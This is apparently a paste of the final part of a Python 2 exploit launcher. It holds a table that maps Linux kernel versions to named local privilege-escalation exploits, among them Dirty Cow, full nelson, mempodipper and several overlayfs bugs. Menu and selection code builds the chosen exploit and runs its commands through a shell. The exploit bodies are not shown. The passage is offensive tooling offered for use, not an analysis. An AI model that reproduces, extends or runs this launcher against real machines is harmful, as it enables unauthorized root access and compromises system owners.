- ("unix_privesc_check" , unix_privesc_check),
- ("kernel 2.4.x / 2.6.x (sock_sendpage 1)" , sendpage_1),
- ("kernel 2.4 / 2.6 (sock_sendpage 2)" , sendpage_2),
- ("kernel < 2.6.22 (ftruncate)" , ftruncate),
- ("kernel < 2.6.34 (cap_sys_admin)" , cap_sys_admin),
- ("kernel 2.6.27 < 2.6.36 (compat)" , compat),
- ("kernel < 2.6.36-rc1 (can bcm)" , can_bcm),
- ("kernel <= 2.6.36-rc8 (rds protocol)" , rdsProtocol),
- ("*kernel < 2.6.36.2 (half nelson)" , halfNelson),
- ("*kernel <= 2.6.37 (full nelson)" , fullNelson),
- ("kernel 2.6 (udev)" , udev),
- ("kernel 3.13 (sgid)" , sgid),
- ("kernel 3.13.0 < 3.19 (overlayfs 1)" , overlayfs_1),
- ("kernel 3.14.5 (libfutex)" , libfutex),
- ("kernel 2.6.39 <= 3.2.2 (mempodipper)" , mempodipper),
- ("*kernel 2.6.28 / 3.0 (alpha-omega)" , alpha_omega),
- ("kernel 2.6.22 < 3.9 (Dirty Cow)" , dirtycow),
- ("kernel 3.7.6 (msr)" , msr),
- ("*kernel < 3.8.9 (perf_swevent_init)" , perf_swevent_init),
- ("kernel <= 4.3.3 (overlayfs 2)" , overlayfs_2),
- ("kernel 4.3.3 (overlayfs 3)" , overlayfs_3),
- ("kernel 4.4.0 (af_packet)" , af_packet),
- ("kernel 4.4.x (double-fdput)" , double_fdput),
- ("kernel 4.4.0-21 (netfilter)" , netfilter),
- ("*kernel 4.4.1 (refcount)" , refcount)
- ]
- # ------------------------------------
- # UTILITY
- # ------------------------------------
- def endpoints(i):
- try:
- i = int(i)
- except ValueError:
- return 0
- if i <= 0:
- return 0
- elif i == 1:
- return len(exploits_windows_remote)
- elif i == 2:
- return len(exploits_windows_remote) + len(exploits_windows_local)
- elif i == 3:
- return len(exploits_windows_remote) + len(exploits_windows_local) + len(exploits_linux_remote)
- elif i >= 4:
- return len(exploits_windows_remote) + len(exploits_windows_local) + len(exploits_linux_remote) + len(exploits_linux_local)
- def usage():
- print "USAGE: %s <exploit id>" % sys.argv[0]
- print "\nWindows Remote Exploits:"
- for i in range(endpoints(0), endpoints(1)):
- print "%i: %s" % (i, exploits_windows_remote[i-endpoints(0)][0])
- print "\nWindows Local Exploits:"
- for i in range(endpoints(1), endpoints(2)):
- print "%i: %s" % (i, exploits_windows_local[i-endpoints(1)][0])
- print "\nLinux Remote Exploits:"
- for i in range(endpoints(2), endpoints(3)):
- print "%i: %s" % (i, exploits_linux_remote[i-endpoints(2)][0])
- print "\nLinux Local Exploits:"
- for i in range(endpoints(3), endpoints(4)):
- print "%i: %s" % (i, exploits_linux_local[i-endpoints(3)][0])
- def select(i):
- if i < 0 or i >= endpoints(4):
- return False
- if i < endpoints(1):
- printStep("Constructing %s" % exploits_windows_remote[i-endpoints(0)][0])
- exploits_windows_remote[i-endpoints(0)][1]()
- elif i < endpoints(2):
- printStep("Constructing %s" % exploits_windows_local[i-endpoints(1)][0])
- exploits_windows_local[i-endpoints(1)][1]()
- elif i < endpoints(3):
- printStep("Constructing %s" % exploits_linux_remote[i-endpoints(2)][0])
- exploits_linux_remote[i-endpoints(2)][1]()
- elif i < endpoints(4):
- printStep("Constructing %s" % exploits_linux_local[i-endpoints(3)][0])
- exploits_linux_local[i-endpoints(3)][1]()
- return True
- def run(commands):
- try:
- for c in commands:
- printStep(c[0])
- subprocess.check_call(c[1], shell=True)
- except subprocess.CalledProcessError:
- printErr("Command failed")
- return False
- except OSError:
- printErr("Command failed")
- return False
- return True
- def printStep(s):
- print "%s [*] %s %s" % ('\033[93m', s, '\033[0m')
- def printErr(s):
- print "%s [!] %s %s" % ('\033[91m', s, '\033[0m')
- def printGood(s):
- print "%s [+] %s %s" % ('\033[92m', s, '\033[0m')
- # ------------------------------------
- # MAIN
- # ------------------------------------
- if len(sys.argv) <> 2:
- usage()
- sys.exit()
- try:
- success = select(int(sys.argv[1]))
- if not success:
- print "[-] Invalid selection: %s" % sys.argv[1]
- usage()
- except ValueError:
- print "[-] Invalid selection: %s" % sys.argv[1]
- usage()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement